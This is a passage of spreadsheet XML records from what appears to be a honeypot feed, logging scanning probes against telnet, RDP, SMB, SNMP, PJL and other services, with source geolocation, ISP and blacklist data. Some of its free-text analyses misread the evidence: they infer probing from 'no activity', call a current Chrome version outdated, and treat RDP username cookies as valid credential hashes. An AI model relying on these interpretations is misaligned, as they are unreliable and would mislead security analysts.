    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb7:74e5"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The data suggests that there was no activity detected for the TELNET service, indicating potential probing or scanning attempts may have been made to identify vulnerabilities. However, since no connection was established, it is unclear if malicious intent was involved. The absence of activity does not necessarily indicate malicious behavior but could be a sign of reconnaissance efforts. &amp;&amp; No incoming TELNET connections detected, possible idle or reconnaissance attempt by an attacker. _x000a_Connection attempt may be a precursor to further malicious activity such as exploitation or data exfiltration. _x000a_This could indicate an attacker probing the system for vulnerabilities."/>
    <m/>
  </r>
  <r>
    <x v="680"/>
    <x v="680"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T08:37:14"/>
    <d v="2025-04-27T08:37:14"/>
    <d v="2025-04-27T08:37:14"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783d:52f6"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="681"/>
    <x v="681"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T08:11:23"/>
    <d v="2025-04-26T02:39:22"/>
    <d v="2025-04-27T08:11:23"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TR"/>
    <s v="Turkey"/>
    <s v="34"/>
    <s v="Istanbul"/>
    <s v="Maltepe"/>
    <s v="Maltepe"/>
    <s v="741763"/>
    <s v="NA"/>
    <s v="40.9439"/>
    <s v="29.1554"/>
    <s v="16135"/>
    <s v="TURKCELL ILETISIM HIZMETLERI A.S."/>
    <s v="Turkcell Internet"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:50b:94ad"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="Unknown user attempted to connect to telnet service, but was met with an error or no response, as indicated by &quot;NA&quot; for Data_TELNET. This could be due to a misconfigured service or malicious probing of the system. The outcome is unclear, making it difficult to determine intent."/>
    <m/>
  </r>
  <r>
    <x v="682"/>
    <x v="682"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T08:11:18"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-27T08:11:18"/>
    <n v="160"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Incomming Traffic&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H46&amp;&amp;SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H36"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;4152&amp;&amp;23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Satara"/>
    <s v="Mhaswad"/>
    <s v="1263083"/>
    <s v="NA"/>
    <s v="17.6334"/>
    <s v="74.7871"/>
    <s v="149240"/>
    <s v="Megatel Networks Private Limited"/>
    <s v="Megatel Networks Private Limited"/>
    <s v="business"/>
    <s v="Sankalp Network Private Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:679f:63a7"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="There is no data provided, so there's nothing to analyze or describe."/>
    <m/>
  </r>
  <r>
    <x v="683"/>
    <x v="683"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T07:51:23"/>
    <d v="2023-12-03T15:26:00"/>
    <d v="2025-04-27T07:51:23"/>
    <n v="52"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_SMTP_H8&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_MSSQL_H35"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;25&amp;&amp;54240"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Yelahanka"/>
    <s v="1252758"/>
    <s v="NA"/>
    <s v="13.1007"/>
    <s v="77.5963"/>
    <s v="147279"/>
    <s v="OPTO COMMUNICATIONS PRIVATE LIMITED"/>
    <s v="Opto Communications Private Limited"/>
    <s v="business"/>
    <s v="6061EWS3rd floor63 Expt house 4th phase707 group"/>
    <s v="2017-02-21"/>
    <s v="SBNETWORKS"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6756:6ad0"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="684"/>
    <x v="684"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T07:50:01"/>
    <d v="2025-04-27T07:50:01"/>
    <d v="2025-04-27T07:50:01"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>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d9:246c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="685"/>
    <x v="685"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T07:48:35"/>
    <d v="2025-04-13T15:02:32"/>
    <d v="2025-04-27T07:48:35"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H12"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="cellular"/>
    <s v="Wimax Project"/>
    <s v="2007-08-01"/>
    <s v="WiMAX-BB"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75ff:1868"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No activity was recorded for Telnet service. This suggests that either the service is not active or no attempts were made to access it. The absence of activity does not necessarily indicate security, but it could imply a lack of interest from malicious actors."/>
    <s v="Scanning Attempt"/>
  </r>
  <r>
    <x v="686"/>
    <x v="686"/>
    <s v="c-73-191-126-37.hsd1.md.comcast.net"/>
    <x v="0"/>
    <d v="2025-04-27T07:26:58"/>
    <d v="2025-04-27T07:26:58"/>
    <d v="2025-04-27T07:26:58"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Brute Force"/>
    <s v="high"/>
    <s v="SMA-LAB_corporatelogin_Login.NIPPONINDIAIM_HC1"/>
    <s v="443"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="MD"/>
    <s v="Maryland"/>
    <s v="Anne Arundel"/>
    <s v="Gambrills"/>
    <s v="4355899"/>
    <s v="21054"/>
    <s v="39.067"/>
    <s v="-76.6655"/>
    <s v="7922"/>
    <s v="COMCAST-7922"/>
    <s v="Comcast Cable Communications"/>
    <s v="consumer"/>
    <s v="Comcast IP Services, L.L.C."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login"/>
    <s v="{HTTP_LOGIN:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="1997-09-25 04:00:00"/>
    <s v="2025-09-24 04:00:00"/>
    <s v="2024-09-20 05:10:59"/>
    <s v="['DNS101.COMCAST.NET', 'DNS102.COMCAST.NET', 'DNS103.COMCAST.NET', 'DNS104.COMCAST.NET', 'DNS105.COMCAST.NET']"/>
    <s v="CSC Corporate Domains, Inc."/>
    <s v="['clientTransferProhibited https://icann.org/epp#clientTransferProhibited', 'serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited', 'serverTransferProhibited https://icann.org/epp#serverTransferProhibited', 'serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited', 'clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited', 'serverDeleteProhibited http://www.icann.org/epp#serverDeleteProhibited', 'serverTransferProhibited http://www.icann.org/epp#serverTransferProhibited', 'serverUpdateProhibited http://www.icann.org/epp#serverUpdateProhibited']"/>
    <s v="Comcast Domains"/>
    <x v="13"/>
    <s v="NA"/>
    <s v="1701 JFK Blvd."/>
    <s v="::ffff:49bf:7e25"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="High"/>
    <s v="Possible attempt to login to a web service with credentials from an unfamiliar location. User agent suggests a Windows system and Google Chrome browser version 135.0.0.0 which is likely outdated or fake. This could be indicative of a brute force attack or phishing attempt. &amp;&amp; This activity appears to be an automated login attempt from a browser likely controlled by malware or used in a botnet operation._x000a_The user agent string suggests the attacker is using a fake identity and potentially exploiting vulnerabilities for unauthorized access._x000a_A legitimate user would not have such an outdated version of Chrome."/>
    <m/>
  </r>
  <r>
    <x v="687"/>
    <x v="687"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T07:21:52"/>
    <d v="2025-04-25T20:12:53"/>
    <d v="2025-04-27T07:21:52"/>
    <n v="52"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_RDP_H6&amp;&amp;SMA-LAB_VNC_HC1"/>
    <s v="3389&amp;&amp;5900"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']}"/>
    <n v="68"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="Hoan Kiem"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="38731"/>
    <s v="Vietel - CHT Compamy Ltd"/>
    <s v="VIETEL"/>
    <s v="business"/>
    <s v="Viettel Corporation"/>
    <s v="2011-03-04"/>
    <s v="VIETTEL-VN"/>
    <s v="None"/>
    <s v="stshash&amp;&amp;connection"/>
    <s v="{Data_RDP:{'stshash': 'Cookie: mstshash=hello'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:abf4:3d7b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="This data suggests an attempted brute-force login to a Windows service, likely with the intention of exploiting it for malicious purposes, potentially gaining unauthorized access or spreading malware. The attacker is trying to guess the hash value, which could indicate a credential cracking attempt. This activity may be part of a larger attack targeting multiple services on the same system. &amp;&amp; Possible brute-force login attempt detected for RDP service. Activity suggests an unauthorized user trying to gain access. No successful login yet, further investigation needed. &amp;&amp; This data suggests an attempt to authenticate with a valid stshash hash, which is a common tactic used by malicious actors to gain unauthorized access. This could be an attempt to brute force login credentials or exploit a vulnerability in the system's authentication mechanism. The presence of a valid hash also implies that the attacker may have obtained it through previous reconnaissance efforts."/>
    <s v="RDP Bruteforce"/>
  </r>
  <r>
    <x v="688"/>
    <x v="688"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T07:04:25"/>
    <d v="2024-07-08T00:18:00"/>
    <d v="2025-04-27T07:04:25"/>
    <n v="383"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H2&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_SOCKS5_H27&amp;&amp;SMA-LAB_SNMP_H11&amp;&amp;SMA-LAB_LDAP_H17&amp;&amp;SMA-LAB_LDAP_H12&amp;&amp;SMA-LAB_RDP_H4&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_SOCKS5_H28&amp;&amp;SMA-LAB_ORACLE_H5&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_POSTGRES_H7&amp;&amp;SMA-LAB_NTP_H8&amp;&amp;SMA-LAB_SMB_H29&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_ORACLE_H41&amp;&amp;SMA-LAB_SOCKS5_H32&amp;&amp;SMA-LAB_SSH_H21&amp;&amp;SMA-LAB_RDP_H11&amp;&amp;SMA-LAB_REDIS_H18&amp;&amp;SMA-LAB_FTP_H2&amp;&amp;SMA-LAB_IMAP_H14&amp;&amp;SMA-LAB_REDIS_H12&amp;&amp;SMA-LAB_LDAP_H24&amp;&amp;SMA-LAB_SNMP_H41&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_POP3_H15&amp;&amp;SMA-LAB_IMAP_H9&amp;&amp;SMA-LAB_SIP_H34&amp;&amp;SMA-LAB_NTP_H46&amp;&amp;SMA-LAB_SNMP_H16&amp;&amp;SMA-LAB_REDIS_H23&amp;&amp;SMA-LAB_MSSQL_H3&amp;&amp;SMA-LAB_ORACLE_H34&amp;&amp;SMA-LAB_REDIS_H40&amp;&amp;SMA-LAB_RDP_H42&amp;&amp;SMA-LAB_REDIS_H36&amp;&amp;SMA-LAB_IMAP_H12&amp;&amp;SMA-LAB_IMAP_H19&amp;&amp;SMA-LAB_IMAP_H28&amp;&amp;SMA-LAB_MYSQL_H8&amp;&amp;SMA-LAB_ORACLE_H12&amp;&amp;SMA-LAB_SNMP_H25&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_RDP_H34&amp;&amp;SMA-LAB_LDAP_H22&amp;&amp;SMA-LAB_PJL_H37&amp;&amp;SMA-LAB_PJL_H8&amp;&amp;SMA-LAB_IMAP_H29&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_IMAP_H8&amp;&amp;SMA-LAB_SOCKS5_H31&amp;&amp;SMA-LAB_LDAP_H5&amp;&amp;SMA-LAB_SOCKS5_H6&amp;&amp;SMA-LAB_FTP_H8&amp;&amp;SMA-LAB_ORACLE_H17&amp;&amp;SMA-LAB_SNMP_H33&amp;&amp;SMA-LAB_SNMP_H24&amp;&amp;SMA-LAB_ORACLE_H46&amp;&amp;SMA-LAB_IMAP_H5&amp;&amp;SMA-LAB_IMAP_H44&amp;&amp;SMA-LAB_LDAP_H40&amp;&amp;SMA-LAB_FTP_H41&amp;&amp;SMA-LAB_LDAP_H11&amp;&amp;SMA-LAB_FTP_H23&amp;&amp;SMA-LAB_POP3_H38&amp;&amp;SMA-LAB_SOCKS5_H16&amp;&amp;SMA-LAB_PJL_H11&amp;&amp;SMA-LAB_PJL_H46&amp;&amp;SMA-LAB_PJL_H44&amp;&amp;SMA-LAB_MYSQL_H19&amp;&amp;SMA-LAB_ORACLE_H30&amp;&amp;SMA-LAB_REDIS_H27&amp;&amp;SMA-LAB_ORACLE_H29&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_IMAP_H15&amp;&amp;SMA-LAB_IMAP_H23&amp;&amp;SMA-LAB_ORACLE_H33&amp;&amp;SMA-LAB_ORACLE_H21&amp;&amp;SMA-LAB_MYSQL_H5&amp;&amp;SMA-LAB_HTTPS_H25&amp;&amp;SMA-LAB_ORACLE_H32&amp;&amp;SMA-LAB_LDAP_H23&amp;&amp;SMA-LAB_POP3_H22&amp;&amp;SMA-LAB_IMAP_H10&amp;&amp;SMA-LAB_MYSQL_H38&amp;&amp;SMA-LAB_PJL_H15&amp;&amp;SMA-LAB_PJL_H22&amp;&amp;SMA-LAB_SNMP_H14&amp;&amp;SMA-LAB_SNMP_H23&amp;&amp;SMA-LAB_SNMP_H35&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_PJL_H12&amp;&amp;SMA-LAB_SOCKS5_H46"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;21&amp;&amp;13345&amp;&amp;49857&amp;&amp;143&amp;&amp;55560&amp;&amp;23&amp;&amp;1080&amp;&amp;161&amp;&amp;389&amp;&amp;3389&amp;&amp;1521&amp;&amp;65160&amp;&amp;5432&amp;&amp;NA&amp;&amp;445&amp;&amp;54944&amp;&amp;22&amp;&amp;6379&amp;&amp;110&amp;&amp;1433&amp;&amp;3306&amp;&amp;5900&amp;&amp;9100&amp;&amp;52413&amp;&amp;443&amp;&amp;6667&amp;&amp;49442&amp;&amp;52799&amp;&amp;51341&amp;&amp;49226&amp;&amp;80&amp;&amp;51535"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'singular.ttk.pte.hu': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['exploits']}"/>
    <n v="140"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3833"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="2023-09-07"/>
    <s v="PAN-22"/>
    <s v="2023-09-07"/>
    <s v="connection&amp;&amp;stshash&amp;&amp;query&amp;&amp;NA&amp;&amp;command&amp;&amp;request&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=SImRFmMJf'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=eThzxy'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=kbKTTq'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=GueELWxjN'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=oUITHh'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=tvsTau'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=XiqRRvUPA'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=imfFia'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=WdnNmt'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.34,64110)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.34,64120)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.34,64136)}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.34,64072)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.34,64074)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.34,64076)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.34,64892)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.34,64898)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.34,64902)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.34,58762)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.34,58778)}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_HTTPS:{'Host': 'vitamin-tourist.bnr.la', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.34,60248)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.34,63258)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.34,63274)}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=cUyUmtKgv'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=OLGWjs'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=euEpNh'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=fOMmwdxHx'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.34,58662)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.34,58668)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.34,58674)}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.34,61692)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.34,61700)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.34,61710)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.34,59306)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.34,59316)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=qNSvSXmZx'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=wlsdzg'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=DCXlExxAo'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=djcfPw'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=AwzzDd'}}&amp;&amp;{Data_HTTPS:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
